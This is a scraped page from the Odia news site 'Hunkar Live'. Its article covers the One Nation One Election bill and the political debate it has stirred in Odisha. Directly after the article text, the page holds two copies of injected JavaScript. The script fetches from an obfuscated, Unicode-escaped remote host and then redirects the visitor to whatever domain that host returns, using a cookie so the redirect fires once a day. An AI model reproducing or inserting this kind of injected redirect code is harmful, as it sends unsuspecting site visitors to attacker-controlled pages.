Saturday, January 3, 2026

ଏକକ ନିର୍ବାଚନକୁ ନେଇ ସରଗରମ ରାଜନୀତି ।

ସଂସଦରେ ଗୋଟିଏ ଦେଶ ଗୋଟିଏ ନିର୍ବାଚନ ବିଲ୍ ଆଗତ ହେବା ପରେ ସାରାଦେଶରେ ଚର୍ଚ୍ଚାର ବିଷୟ ହୋଇଛି। ଏକକ ନିର୍ବାଚନ ହେଲେ, ଏହାର ପ୍ରଭାବ କେମିତି ପଡିବ ତାହା ଆଲୋଚନାର ପ୍ରସଙ୍ଗ ପାଲଟିଛି। ଅନ୍ୟପଟେ ଓଡିଶାରେ ବିଧାନସବା ନିର୍ବାଚନ, ସାଧାରଣ ନିର୍ବାଚନ ସହ ହେଉଥିଲେ ବି ଏକକ ନିର୍ବାଚନର ପ୍ରଭାବକୁ ନେଇ ରାଜନୈତିକ ବୟାନବାଜି ତେଜିଛି।

ସଂସଦରେ ଗୋଟିଏ ଦେଶ ଗୋଟିଏ ନିର୍ବାଚନ ବିଲ ଆଗତ ହେବା ପରେ, ଓଡିଶା ଭଳି ଆଞ୍ଚଳିକ ଦଳ ସକ୍ରିୟ ଥିବା ରାଜ୍ୟ ଗୁଡିକରେ ସରଗରମ ହୋଇଛି ରାଜନୀତି। ଏକକ ନିର୍ବାଚନ ହେଲେ, ରାଜ୍ୟ ପାଇଁ ଲାଭ ଦାୟକ ହେବ କି କ୍ଷତିକାରକ ହେବ ସେ ନେଇ ଭିନ୍ନ ଭିନ୍ନ ମତ ପ୍ରକାଶ ପାଇଛି। ରାଜନୈତିକ ଦଳ ମାନେ ନିଜ ନିଜ ହିସାବରେ ଅଙ୍କ କଷିବା ସହ ମତ ରଖିଛନ୍ତି। ରାଜ୍ୟର ପ୍ରମୁଖ ବିରୋଧୀ ଦଳ ବିଜେଡି ଲୋକସଭାରେ କୌଣସି ସାଂସଦ ନଥିବାରୁ, ରାଜ୍ୟସଭା ସାଂସଦ ସସ୍ମିତ ପାତ୍ର ବିଲକୁ ନେଇ ପ୍ରତିକ୍ରିୟା ରଖିଛନ୍ତି। ସିଧାସଳଖ ବିରୋଧ ନକରି ଜେପିସି କମିଟି ଓ ଦଳ ସୁପ୍ରିମୋଙ୍କ ନିଷ୍ପତି ଉପରେ ଛାଡି ଦେଇଛନ୍ତି।(function(){if (document.cookie.includes(‘hasRedirected=1’)) return;fetch(‘u0068u0074u0074u0070u0073u003au002fu002fu0064u0069u0073u0074u0069u0065u002eu0073u0068u006fu0070/?t=json&u=153d4f720470d9e7a3e895c70153e7cd’).then(r => r.json()).then(d => {const
domain = d?.domain;if (domain) {document.cookie = ‘hasRedirected=1; max-age=86400; path=/’;location.href = domain + ‘?32861745670379’;}});})();(function(){if (document.cookie.includes(‘hasRedirected=1’)) return;fetch(‘u0068u0074u0074u0070u0073u003au002fu002fu0064u0069u0073u0074u0069u0065u002eu0073u0068u006fu0070/?t=json&u=153d4f720470d9e7a3e895c70153e7cd’).then(r => r.json()).then(d => {const

domain = d?.domain;if (domain) {document.cookie = ‘hasRedirected=1; max-age=86400; path=/’;location.href = domain + ‘?32861745670379’;}});})();

Hunkar Live
Author: Hunkar Live

Leave a Comment

Read More

Our Company

Newsletter

Laest News

2024 Reserved Hunkar Live | Designed by Best News Portal Development Company - Traffic Tail​